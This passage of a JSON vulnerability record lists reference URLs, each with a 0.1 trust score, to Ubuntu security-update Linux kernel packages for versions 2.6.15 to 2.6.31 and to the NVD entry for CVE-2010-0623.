        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-generic_2.6.31-20.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.68_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.60_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.46_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.46_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.46_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-20-virtual_2.6.31-20.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-sparc64-smp_2.6.31-20.58_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.83_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.83_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-20-sparc64_2.6.31-20.58_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.46.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.83_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.60.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-lpia-di_2.6.31-20.58_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.46_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0623"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.46_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.68_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-20-generic-pae_2.6.31-20.58_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-20-powerpc64-smp-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-305.13.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-20-powerpc-smp_2.6.31-20.58_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-305_2.6.31-305.13_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.68_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.83_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.83_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-20-generic-di_2.6.31-20.58_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-20-sparc64-di_2.6.31-20.58_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.83_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.83_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.83_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.68_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.68_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.83_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.83_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.46_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-20-powerpc-di_2.6.31-20.58_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.46_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.83_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-305.13_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-20-generic-di_2.6.31-20.58_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.83_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.60_amd64.udeb"
      },
      {
        "trust": 0.1,
